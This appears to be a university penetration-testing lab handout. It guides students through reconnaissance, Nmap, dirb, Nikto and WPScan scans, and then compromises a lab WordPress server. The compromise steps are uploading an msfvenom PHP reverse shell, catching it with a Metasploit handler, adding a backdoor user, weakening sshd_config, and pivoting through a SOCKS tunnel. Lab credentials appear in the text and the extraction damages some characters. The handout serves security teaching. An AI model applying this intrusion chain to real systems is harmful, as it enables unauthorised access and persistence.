Professional Documents
Culture Documents
Penetration Testing Lab PDF
Penetration Testing Lab PDF
In Sec!on 2, you will be using Kali Linux virtual machine to gain an understanding of a network by using it as an a"acking
machine to launch selected a"acks against the network. Based on the steps you perform, you will need to capture evidence
and write a Penetra!on Tes!ng Report (review the reference !tled Pentest Report on how to write this report). You will report
your findings to your organiza!onal leadership by discussing informa!on about the network, along with the iden!fied
vulnerabili!es, and providing your recommenda!on to address the vulnerabili!es.
In Sec!on 1, you will need to answer ques!ons that require the use of the internet. Since the lab VMs are within a closed
network (meaning no direct connec!on to the Internet), you will need to use your Workspace or personal computer to answer
those ques!ons.
Lab Resources
Access Instruc!ons:
To access the lab environment, use the “UMUC Digital Labs” document, which contains instruc!ons for both the lab setup
and other details rela!ng to the UMUC virtual lab environment.
Username: StudentFirst
Password: Cyb3rl@b
VM # OS Type VM Name
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 1 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
VM # OS Type VM Name
h"p://www.youtube.com/watch?v=cnkLv_RE3EI (h"p://www.youtube.com/watch?v=cnkLv_RE3EI)
h"p://www.youtube.com/watch?v=TCPyoWHy4eA (h"p://www.youtube.com/watch?v=TCPyoWHy4eA)
Msfvenom Tutorial
h"ps://www.youtube.com/watch?v=CtVH0MCv3DI (h"p://www.youtube.com/watch?v=CtVH0MCv3DI)
h"ps://www.youtube.com/watch?v=ugHJMnI_C_E (h"p://www.youtube.com/watch?v=ugHJMnI_C_E)
Pentest Report
h"p://www.pentest-standard.org/index.php/Repor!ng (h"p://www.pentest-standard.org/index.php/Repor!ng)
Weevely
h"ps://github.com/epinna/weevely3/wiki/Install-and-first-run (h"ps://github.com/epinna/weevely3/wiki/Install-and-first-
run)
Username: StudentFirst
Password: Cyb3rl@b
Phase 1 Reconnaissance
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 2 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Phase 1 Reconnaissance
Phase 2 Scanning
Phase 3 A"ack and Gaining Access Phase 4 Maintaining Access
Phase 5 Covering Tracks
Phase 1: Reconnaissance
During this phase, you can make use of any computer with internet access including your workspace VM. You will not use any
of the lab VMs. The first phase of Pentes!ng is the reconnaissance, which is used to find everything you can learn about the
target. Normally, you will use Google and other search engines to learn about the target. In addi!on to search engines, you
should also use Internet tools such as whois or other similar tools to look up domains and to collect informa!on. You must
catalog all the informa!on you collect. Below, you’ll see examples of informa!on search using Google (which can be done on
your own desktop).
Google
There are many ways to search company-specific informa!on on the web. This can be completed with the use of search
engines such as Google, Bing, or Yahoo. Each of these search engines has advanced search op!ons that can be used to search
for files, words, and other details about a target company. For this exercise, you will use Google and its advanced search
op!ons. Follow the steps below to collect informa!on about UMUC.
Step-by-Step Instruc!ons
1. Start with a basic search for a specific site. This is completed with the search term of “site:” followed by the name of the
website. The following shows a search that targets umuc.edu. For example, using Google, type the following in the search
box:
site:umuc.edu
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 3 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
2. The next search opera!on will look for any text that is found within the URL of a website. This search operator is
performed with adding “inurl:” to the search string. For this search, you will look for all pages that contain cybersecurity
within the URL. For example, using Google, type the following in the search box:
site:umuc.edu inurl:cybersecurity
3. The next search will look for the file types that can be found on a web server. This search is done with the use of the
command “filetype:” followed by the file extension. For example, using Google, type the following in the search box:
site:umuc.edu filetype:pdf
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 4 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
4. The next search will look for text that is found on a web page. This search is done with the command of “intext:” followed
by the text to search for. For example, using Google, type the following in the search box:
5. Outside of using these high-level search commands, you can also combine the advanced searches. Next, you will combine
the use of “intext” and “filetype.” For example, using Google, type the following in the search box:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 5 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Lab Ques!ons
Using the tutorial above, respond to the following ques!ons (and put in your lab report):
1. Perform three advanced searches, state what you were searching for, and then take a screenshot of each search.
2. For each of the searches, why did the results change? How can you combine the searches to narrow the results?
3. How can the search techniques above be used by both black and white hathackers?
4. What type of informa!on would you look for when performing informa!on gathering?
6. Research two other search engines and provide the details to conduct the same type of informa!on gathering. Provide the
search results, what you searched for, and a screenshot.
7. You were conduc!ng informa!on gathering of a company website; however, no search engine provided any details. A#er
reviewing the website, you saw an email address with a different domain than that of the website. How can this beused?
Phase 2: Scanning
The second phase of a penetra!on tes!ng is scanning. This is when you use scanning tools such as dirb, Nmap, Nikto, and
others to collect addi!onal useful informa!on. The scanning phase will help you to iden!fy IP addresses, ports, opera!ng
systems, plugins, and other details. Some of the tools that we will be using in this sec!on are:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 6 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
dirb
The first tool in your arsenal is dirb. This tool is used to iden!fy both known and unknown directories of a website. The tool
uses a file called a wordlist to ini!ate web requests to a website in order to iden!fy its directories. Dirb is used by both black
hat and white hat hackers.
To be"er understand the flags and arguments found in dirb and other tools, you should always start by looking at the help
informa!on provided by the tool. To view the dirb help informa!on with Kali Linux, open the terminal and enter “dirb” at the
command prompt. Review the output to familiarize yourself with the tool.
The dirb help is broken down into four different sec!ons: NOTES, HOTKEYS, OPTIONS, and EXAMPLES. The NOTES sec!on of
the help file refers to the content above it. This explains how to provide the commands to dirb. HOTKEYS are used to perform
different ac!ons during a scan. Op!ons are used to tell dirb to try different op!ons during a scan. The EXAMPLES sec!on
provides examples of how to write the commands. The screenshot below shows the command which was used to view the
help informa!on and a small sec!on of theoutput:
Please review the flags or op!ons described within the output of the dirb command.
-a op!on
The first op!on on the list is –a. This is used to change the user agent string. The user agent string is a set of data that tells the
server what type of system requested the informa!on. Depending on the browser you use, you may see different user agent
strings. However, the point of this op!on is to mask the use of dirb and to make it appear as a browser requested the content.
-c op!on
The next op!on on the list is the cookie string. The cookie string can be used for a few reasons. The informa!on could have
been collected with the use of cross-site scrip!ng, or provided by the client.
-i op!on
The next op!on is case insensi!vity. This op!on tells dirb to try more requests based on possible character case. For example,
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 7 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
The next op!on is case insensi!vity. This op!on tells dirb to try more requests based on possible character case. For example,
if your wordlist is only in lowercase, the scan may not return a result for uppercase le"ers. The same can be said about the
other way around.
-r and -R op!ons
The next set of op!ons is recursive scans. The -r op!on is used to tell dirb to not scan or rather enter new directories.
However, -R tells dirb to scan the new directories but to ask before entering new directories.
-X op!on
The last op!on we will review is the -X op!on. This op!on is used to define extensions to also add to the scan. What happens
is that dirb will take the wordlist and add the extensions to the end of those words.
The dirb help shows four different parts needed for the command to execute. The first part, dirb, is the text used to start dirb.
The next part, <url_base>, is the URL that is being brute-forced. The next part is the wordlist to use for the scan. For the
wordlist op!on to work, you need to provide the directory loca!on of the wordlist file. These op!ons were explained earlier.
With dirb, you can also run default scans. The default scans revert to a default se%ng, which tells dirb to use a common
wordlist and to automa!cally enter new directories. The basic or default scan is provided to dirb in the wordlist or other
op!ons. The basic op!on is the one mostly used in the dirb scans. The following is an example of the command:
Note: Site_to_test.com is a place holder for the actual website, so you need to change this to the real and specific websites
against which you will be tes!ng.
dirb_h"p://site_to_test.com
Nikto
Nikto is a web applica!on vulnerability scanner used to iden!fy vulnerabili!es of websites, and web applica!ons. Like dirb,
Nikto has its own set of flags and these flags can be reviewed by providing the -help flag. The next image shows the full list of
the help commands:
Like dirb, these flags are used by Nikto to perform different func!ons. However, the main difference when you review the help
content of Nikto are the flags that contain a plus symbol. These plus symbols designate addi!onal values needed for each flag.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 8 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
content of Nikto are the flags that contain a plus symbol. These plus symbols designate addi!onal values needed for each flag.
We will now review each of the flags.
1 - Show redirects: This op!on tells Nikto to show when the web server has a redirect to some other loca!on.
2 - Show cookies received: This op!on tells Nikto to show the cookies used by the web server.
3 - Show all 200/OK responses: This op!on tells Nikto to show all 200 response codes from the web server.
4 - Show URLs which require authen!ca!on: This op!on tells Nikto to show all URLs that contain an authen!ca!on for
the web server.
D - Debug Output: This op!on shows the data that is sent to the web server.
E - Display all HTTP errors: This op!on shows all HTTP-based error messages and codes.
P - Print progress to STDOUT: This op!on shows the status while Nikto is running the scan.
V - Verbose Output: This op!on shows or lists everything that Nikto is doing while it is scanning the web server.
To add this op!on, you would type this within the terminal:
-Format+ - This op!on tells Nikto which file format to use during the output of the results
h"ps://cirt.net/nikto2-docs/op!ons.html (h"ps://cirt.net/nikto2-docs/op!ons.html)
nikto -h 10.0.250.200
While Nikto is running, you will see the following within the terminal:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 9 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
WPScan
The next tool you will examine is WPScan. This tool is used for scanning WordPress websites. You need to familiar yourself
with the command op!ons. Below is the command to access the tool:
Nmap
Nmap is a security scanner that is used to discover hosts and services on a computer network. Based on network condi!ons, it
sends out packets with specific informa!on to the target host device and then evaluates the responses. To hack into a
computer system, an a"acker must target a machine and iden!fy which ports on which the machine is listening. The a"acker
can sweep networks and locate vulnerable targets using scanners such as Nmap. Nmap also uses TCP stack fingerprin!ng to
accurately determine the type of system being scanned.
Nmap is flexible in specifying targets. Simply scan one host or scan en!re networks by poin!ng Nmap to the network address
with a CIDR "prefix/mask" appended to it. In addi!on, Nmap will allow you to specify networks with wild cards, such as
192.168.10.*, which is the same as 192.168.10.0/24. For example, in our case, we can indicate the range of target hosts as
follows:
192.168.10.103-106
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 10 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
by Nmap to be up. In this example, you could scan all hosts on the 192.168.10.0 network.
Both Zenmap, the official Nmap Graphical User Interface (GUI), and the Nmap command-line interface (CLI) will allow you to
enter this command and run the scan. Some!mes you may merely want to check the availability of a system without sending
ICMP echo requests, which may be blocked by some sites. In this case, a TCP "ping" sweep can be used to scan a target's
network. A TCP "ping" will send an ACK to each machine on a target network. Machines that are up should respond with a TCP
RST. To use the TCP "ping" op!on with a ping scan, include the "-PT" flag to target a specific port on the network you're
probing. In our example, we'll use port 80 (h"p), which is the default, and it will probably be allowed through the target's
border routers and possibly even its firewall.
Note that the targeted port does not need to be open on the hosts that are being probed to determine if the machine is up or
not. We launch this type of scan as follows:
When a poten!al intruder knows which machines on the target's network are alive, typically the next step is port scanning.
TCP Connect
When an a"acker is using TCP connect scans, Nmap will use the connect () system call to open connec!ons to interes!ng
ports on the target host and complete the three-way TCP handshake. The probe is easily detected by the target host. Logs on
the host machine will show these ports being opened by the a"acker. A TCP connect scan is used with the "-sT"flag as:
Stealth Scanning
What if an a"acker wants to scan a host without being logged on the target machine? TCP SYN scans are less prone to logging
on the target's machine, because a full handshake never completes. A SYN scan starts by sending a SYN packet, which is the
first packet in TCP nego!a!on (three-way handshake). Any open port will respond with a SYN|ACK, as they should. However,
the a"acker sends a RST instead of an ACK, which terminates the connec!on. The advantage is that the three-way handshake
never completes, and fewer sites will log this type of probe. Ports that are closed will respond to the ini!al SYN with a RST,
allowing Nmap to determine that the host isn't listening on that port. This command might require root privileges, which could
be obtained by trying "sudo" command at the knoppix prompt. The "-sS" flag will launch a SYN scan against a host or network
as:
Although SYN scans are more likely to be unno!ced, they can s!ll be detected by some intrusion detec!on countermeasures.
The Stealth FIN, Xmas Tree, and Null scans are used to evade packet filters and firewalls that may be watching for SYN packets
directed toward restricted ports. These three scans should return a RST for closed ports, whereas open ports should drop the
packet. A FIN "-sF" scan will send a FIN packet to each port, whereas the Xmas Tree scan "-sX" turns on the FIN, URG, and
PUSH flags, and a Null scan "-sN" turns off all flags. Because of Microso"'s noncompliance with TCP standards, the FIN, Xmas
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 11 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Tree, and Null scans are only effec!ve on non-Microso" opera!ng systems.
UDP Scanning
Using the UDP scan "-sU", an a"acker can determine what ports are open to UDP on a host. Nmap will send a 0-byte UDP
packet to each port. If the host returns a "port unreachable" message, that port is considered closed. This method can be !me-
consuming because most UNIX hosts limit the rate of ICMP errors. Fortunately, Nmap detects this rate and slows itself down,
so not to overflow the target with messages that would have been ignored. Launch a UDP scan as follows:
OS Fingerprin!ng
O#en, an intruder may be more familiar with exploits for a par!cular opera!ng system and may be looking for machines to
compromise easily. OS fingerprin!ng is used to determine which OS is running on the host. A common op!on is TCP/IP
fingerprin!ng with the "-O" op!on to determine the remote opera!ng system. This has to be combined with a port scan and
not a ping scan. Nmap accomplishes this by sending different types of probes to the host, which can narrow the target
opera!ng system. Fingerprin!ng the TCP stack includes such techniques as FIN probing to see what kind of response the
target has, BOGUS flag probing to see the remote host's reac!on to undefined flags sent with a SYN packet, TCP Ini!al
Sequence Number (ISN) sampling to find pa"erns of ISN numbers, as well as other methods of determining the remote
opera!ng system.
The TCP Sequence Predic!on tells us how difficult TCP sequence number predic!on is for the remote host. This is valuable to
an a"acker looking for hosts that can be vulnerable to session hijacking.
Other Op!ons
-P0 Do not try to ping hosts at all before scanning them. Since Nmap will ping a target with both TCP "ping" and ICMP echo
before a"emp!ng a port scan, sites blocking ICMP and TCP probes will not be scanned by default.
"-v" This is verbose op!on that can be used with all types of scans. You can use this flag to get more informa!on about the
target's machine.
The ability to target specific ports is accomplished with the "-p " op!on. For instance, if an a"acker wanted to probe your web
server for #p (port 21), telnet (port 23), DNS name service (port 53), and h"p (port 80), and wanted to know the OS you were
using. The a"acker may try the SYN scan:
For a complete list of the op!ons for Nmap, you can see the manual of the NMAP at h"p://www.insecure.org/nmap
(h"p://www.insecure.org/nmap) .
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 12 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Ping Sweeping
Icmp ping # sudo nmap -sP “host IP address”
tcp ping # sudo nmap -sP -PT80 “host IP address”
Port Scanning
TCP connect # sudo nmap -sT “host IP address”
Stealth scanning # sudo nmap -sS “host IP
address” UDP scanning # sudo nmap -sU “host IP
address” Stealth FIN # sudo nmap -sF “host IP address”
Xmas Tree # sudo nmap -sX “host IP address”
Null scan # sudo nmap -sN “host IP address”
Remember that all of the informa!on collected during the scanning phase needs to be recorded and saved. The first two
phases of an a"ack change how you will a"ack the network. A#er you collect the informa!on, you can use the Internet to
search for possible exploits. You can use different so#ware tools, and other data that would help you successfully conduct the
Pentes!ng.
Prior to star!ng the next phase, you will first develop an a"ack scenario. Ideally, you will recreate the target network in a
sandbox environment based on the collected informa!on. You will then test the a"ack scenario in the sandbox environment on
the modeled network. This is to avoid accidental security incidents such as Dos a"ack on your own network.
Burp Suite
Burp Suite is a unique tool, which can be used within many different areas of penetra!on tes!ng. The tool allows for scanning,
crawling, and proxying requests. There are two different versions of Burp Suite: paid and free. The free version does not have
scanning capabili!es, whereas the paid version does. The screenshot below shows the Burp Suite user interface.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 13 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Along the top of the screen, you will see 12 different tabs namely, Target, Proxy, Spider, Scanner, Intruder, Repeater, Decoder,
Comparer, Extender, Op!ons, and Alerts.
The Target tab - Under Target, you have two more bu"ons, Site Map and Scope. Site Map shows you the site map of hosts that
Burp Suite saw traffic for. Scope allows you to define which systems are in or out of scope.
The Proxy tab - The proxy part of Burp Suite allows you to capture traffic as it is leaving your host and modify the traffic as it is
going to the server. To use this part of Burp Suite, set your browser to use Burp Suite as a proxy.
An exploit is the means by which an a"acker takes advantage of a flaw within a system, an applica!on, a service, a network
device such as webserver. An a"acker uses an exploit to a"ack a system in a way that results in a compromise by running an
arbitrary payload when triggered by the vic!m. You can watch the videos from the links provided in the reference sec!on of
this document to learn more about the tools associated with Kali Linux.
NIXATK01 (Kali)
Username: StudentFirst
Password: Cyb3rl@b
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 14 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Before you clone the website, create a new folder on the Desktop of your a"ack VM, NIXATK01.
Note: You can open it from two different loca!ons. The first loca!on is at the bo"om of the screen on the .
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 16 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
The second loca!on is from the Applica!on menu at the top le# of the screen. The icon looks the same as found within
the dock .
$ cd Desktop/website_clone
$ pwd
d. Run the HTTrack tool to clone the website using the following command:
Note: When you run the above command, you may see the following error message. If this happens, do not be alarmed;
this is normal within this environment.
Note: When you run the above command you have to enter the password for StudentFirst (Cyb3rl@b) but no characters
for it will show up on the screen when typing. It may seem like nothing is being entered, but the characters are being
entered.
See the figure below for the expected output of the httrack command:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 17 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
A#er HTTrack has completed, go to the folder that you created on the desktop and open the index.html file (double click
on the index.html file, in the file system). You will see a website that displays the message, “You have gone to the wrong
loca!on”. This means that the website uses a different directory for the home directory.
Next, open the browser and go to the www.acme.com website (h"p://www.acme.comwebsite/) . You should see the clone
of your original page. Now that the website is open, right-click on the webpage and select View page source. Do you see any
plain text message that resembles the warning message received above?
a. Perform a port scan (in a terminal window) using the following command (Enter the password for StudentFirst (Cyb3rl@b)
if you are prompted to):
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 18 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Based on what you learned from the Nmap scan of the webserver, answer the following ques!ons:
Step 2 - Iden!fy the directories of the first webserver (www.acme.com) website by using the dirb tool.
a. Type the following command (in a terminal window) to scan the website with dirb (Enter the password for StudentFirst
(Cyb3rl@b), if you are prompted to):
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 19 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
What directories and files were iden!fied by the dirb scan? Include your findings in the final report.
A#er iden!fying the directories of the webserver with the dirb scan, you next use Nikto to explore further.
a. Type the following command (in a terminal window) to start the scan (Enter the password for StudentFirst (Cyb3rl@b) if
you are prompted to):
The screenshots below show the output of the Nikto scan. Pay close a"en!on to the server informa!on (i.e. Target IP,
Hostname, Port used, type of server etc…).
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 20 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
A#er the Nikto scan has completed, address the following and include your answers in the final report.
1. Compare the Nmap and Nikto scan results while focusing on the port numbers reported by the two scans.
3. Select three different OSVDB found within the scan. Do a Google search for the three that you selected. Explain any
informa!on that you found about those OSVDBs.
Now that you have determined that the webserver is running WordPress, use WPScan for further explora!on.
Run the following command (in a terminal window) to start the WPScan of the webserver (Enter the password for StudentFirst
(Cyb3rl@b) if you are prompted to):
Note: WPScan will ask you if you want to update the scanner. Type N for no and hit Enter. The screenshot below displays the
“wpscan” scan results.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 22 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
From the output of “WPScan” no!ce that each line item begins with a red, yellow, or green plus sign. Red plus signs mean that
the webserver has some vulnerabili!es. Review the details of each line item and answer the following ques!ons:
3. Do you see any vulnerabili!es that have a remote code execu!on or arbitrary file upload? Are there any other red alerts?
5. How is the vulnerability with the highest risk on the list exploited?
Now that you have iden!fied vulnerabili!es exis!ng on the webserver with the previous scans, you can begin exploi!ng the
network using some of these vulnerabili!es.
The WPScan revealed that WordPress has an “Arbitrary File Upload” vulnerability as seen in the screenshot below. You can
take advantage of this vulnerability to upload a malicious payload that will used to compromise the webserver.
In the steps that follow, you will create a listener on the Kali VM, upload a php shell to the webserver, and execute the shell to
compromise the webserver.
To create the shell, you will use msfvenom command for crea!ng the file (payload) that needs to be uploaded to the webserver
(MSFvenom command is a combina!on of Msfpayload and Msfencode, pu%ng both of these tools into a single Framework
instance. It will create a payload that will be used in a social engineering a"ack).
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 23 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
a. On your NIXATK01 a"acking machine (Kali VM), type the following command in terminal:
A#er successfully execu!ng the above command, you should get the following output:
You will edit the produced “msfvenom.php”file to add php open and php close tags at the start and the end of the file. This
make the “msfvenom.php” file a complete php file. Follow the steps below.
a. Right click on the “msfvenom.php” file on the desktop and select “Open with Leafpad”.
b. When the file opens in Leafpad, type <?php at the beginning and ?> at the end of thefile.
The content of the file a#er edi!ng is depicted in the screenshot below:
Using social engineering techniques, the a"acker deliver malicious code to poten!al vic!ms and coerce them into execu!ng
these codes on their local machines. Typically, social engineering a"acks u!lize delivery techniques, such as email, USB drives,
phone calls, or even visi!ng a physical loca!on onsite. For example, using an email, an a"acker can deliver malicious files and
other applica!ons containing executables codes that can be unknowingly installed by users by clicking on certain links in an
email, or launching certain applica!ons with embedded malicious code.
In this exercise, we will deliver the malicious code (msfvenom.php) to the webserver (the target machine) using the following
steps:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 24 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
a. From the desktop of your NIXATK01 VM, double click and open the “Lab Resources” folder.
c. Click on the “Download Project resources” shortcut to get to the “CST630 Project Resources” page.
d. Under “Project 1”, click on WP Exploit [www.acme.com (h"p://www.acme.com/) ] to get to the uploadpage
e. Once, on the upload page, click on the “Browse...” bu"on and select the msfvenom.php file located on the desktop of your
VM.
f. A#er the file is selected from your desktop, click on the “upload!” bu"on.
g. When the file is successfully uploaded, you will see the following message displayed:
{"success":true,"fileName":"\/\/\/msfvenomtest.php"}
A#er the file is uploaded, make sure you can see it within the directory lis!ng on the web server.
a. Browse to the upload directory by using the following URL from your NIXATK01 VM: www.acme.com/wordpress/wp-
content/uploads (h"p://www.acme.com/wordpress/wp-content/uploads)
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 25 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
a. Open a terminal window and type the following command to open Metasploit:
$ sudo msfconsole
If prompted, enter the “StudentFirst” account password (Cyb3rl@b). A#er Metasploit has successfully loaded, you should
see a screenshot similar to the one below:
b. Enter the following commands (without the “msf >” prompt) to setup the handler:
c. Verifying current configura!on a#er se%ng the payload by typing the following command:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 26 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
d. Type the following commands (without the “msf >” prompt) to set the LHOST and LPORT payload op!ons.
msf > set lhost 192.168.10.101
msf > set lport 80
show op!ons
You will see the following in the terminal window. This will let you know that the listener has been created and Metasploit
is wai!ng for a call-back session from triggering the payload.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 27 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
g. Go to the upload directory and click on the “php” file that you earlier uploaded to the webserver (in the web browser).
Note: A#er you click on the php file, you should get the call back to your handler to establish a meterpreter session as
shown in the screenshot below.
You will know that you have a call back when you see “Meterpreter session 1 opened” as seen in the screenshot above.
Now that you have the call back, run a few checks to see what level of access you have and obtain some system specific
informa!on.
Note: Use the “help” command to get addi!onal informa!on about Core commands, File System Commands, Networking
Commands available to you once the meterpreter session is established.
b. Use shell command to drop your current meterpreter session into a system command shell.
Note: The number of channels created (i.e. Channel 0 created, Channel 1 created…) as seen in the screenshots above is related
to how many !mes you use the shell command during the meterpreter session.
Create a user named bob and set the password to bob. This user account (“anchor” account) is used by the hacker to gain
addi!onal access, such as privileged escala!ons, and pivot different parts of the internal network.
a. In the current session window, type and enter the following command to create a user bob (a#er entering the below
command, enter the command in part b, without wai!ng for response from system, since there will be no response from
the system):
b. Now, set the password for the user “bob” to bobpass with the following command:
Note:
1. The above command tells the system to set the password for bob. A#er entering the command, you will be prompted to
provide the desired password; enter “bobpass” for the password and re-enter to confirm.
Now that you have a user account that you have full control over on the compromised system, you will use that system to
pivot to the next part of the network. The term pivo!ng is used when describing the act of leapfrogging from one host to
another. Hackers use pivo!ng to gain access to network segments when normal access is not allowed. To do this, you will use
SSH to create a SOCKS connec!on to the web server. The SOCKS protocol allows a client to make network connec!ons, and
exchange network packets between a client and a server, through a proxy.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 29 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
The following will guide you through the steps of crea!ng this connec!on:
You will now create a socks proxy connec!on to webserver using port 3434 on the NIXTGT01 VM (192.168.10.111).
As you can see, the SSH connec!on a"empt to the webserver failed due to a permission denial error related to an
unrecognized cer!ficate. To bypass this requirement, you need to make configura!on changes to the sshd_config file on the
target webserver. In order to do this, you will download a copy of the sshd_config file, edit it, and overwrite the original on the
webserver.
Step 3 – Downloading and Modifying sshd_config file from the compromised system (First webserver)
a. Now, go back to the terminal window with the Meterpreter session to the first web server.
Note: You will use Meterpreter to download a copy of the “sshd_config” file to be edited using the Meterpreter session.
exit
This will take you out of the shell session and back into the meterpreter session as shown below.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 30 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
c. Download a copy of the sshd_config file. Within the Meterpreter session by entering the following command:
Note: The Meterpreter session will indicate that the file is being downloaded when the download is in progress by displaying
“downloading:” followed by the file source and des!na!on paths (The “downloading” process may take longer depending on the file
size) then it will indicate that the file is downloaded by displaying “download:” followed by the source and des!na!on paths.
A#er a successful download, a copy of the “sshd_config” file will be placed on the Desktop of the NIXATK01 VM as specified
by the des!na!on path provided in the command.
No!ce that the downloaded copy of the “sshd_config” file is locked and has “Read only” permissions for everyone. In order to
edit and upload a copy of this file to the compromised webserver, you need create and editable copy and save it with the
original file name.
e. Now, create a copy of the “sshd_config_original” file on the Desktop and rename it “sshd_config” (Right click on
sshd_config_original, then select copy, then paste the file on the desktop, then select the pasted file and rename it to
sshd_config).
f. Then, right-click on the “sshd_config” file and then select “Open with Leafpad.”
g. A#er the file is opened, look for the line “#PasswordAuthen!ca!on Yes” and remove the “#” sign.
h. Then, look for the “PasswordAuthen!ca!on No” and add the “#” sign.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 31 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Note: The “#” sign is used to comment out lines of code in the configura!on file. In other words, the “#” sign is used to
turn on or off parts of the configura!on file.
j. A#er the three changes have been made, save the “sshd_config” file.
Step 4 – Uploading the modified sshd_config file back to the compromised system.
a. Go back to the terminal window with the Meterpreter session and type the following command to upload the sshd_config
file to the “tmp” directory of the webserver.
Note:
1- Uploading to the “tmp” directory of the webserver first, facilitates the overwri!ng of the original “sshd_config” file on
the compromised webserver.
2-Make sure that the meterpreter session is s!ll alive before entering the following command. If the session is closed for
any reason, you must go back to Step 5 (f) of part 3 and reestablish the session.
In order to copy the modified “sshd_config” file and override the original file on the webserver, we need to drop back into a
shell within the Meterpreter session to execute the copy command.
b. In the shell, override the original “sshd_config”file on the webserver using the following copy command:
c. While in the shell, stop and then start the sshd service by entering the following command:
d. Open a new terminal window and enter the following command to create the socks proxy.
Note: When prompted, first, enter the password for the “StudentFirst” account, “Cyb3rl@b”. Then, enter the password for
“bob”, “bobpass”.
Note: A#er the SSH session has been successfully established, you should see the command prompt change from
“StudentFirst@cst630-nixatk01:~$” to “[bob@cst630- nix$01 ~] $”.
Unlike in the first a"empt, now that the configura!on has been changed and forced to be accepted, the user bob is now
allowed access via SSH.
Part 5 - Scanning with the second webserver (hr.acme.com) with dirb and
wpscan tools.
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 33 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
wpscan tools.
Because your a"acker VM, NIXATK01, does not have direct access to the second webserver, hr.acme.com, you will employ
pivo!ng techniques by leveraging the already established SSH connec!on to the first webserver to run dirb scans against the
second webserver, which is also on that same network.
Note
Note: You will set up SOCKS proxy with SSH tunnel connec!on to the first webserver on the localhost, 127.0.0.1, with a
source port 3434.
The dirb scan has iden!fied that the internal webserver (2nd webserver) is also a WordPress server. Run a wpscan of the
internal webserver by entering the following command in terminal:
https://content.umuc.edu/file/86d36d98-d23a-4001-ac03-91ab25dd1b47/2/Project1Workspace(2).html Page 34 of 47
Penetration Testing Lab 3/25/20, 5:21 PM
Answer the following ques!ons and include your answers in your final report:
3. Do you see any vulnerabili!es that have a remote code execu!on or arbitrary file upload? Are there any other red alerts?
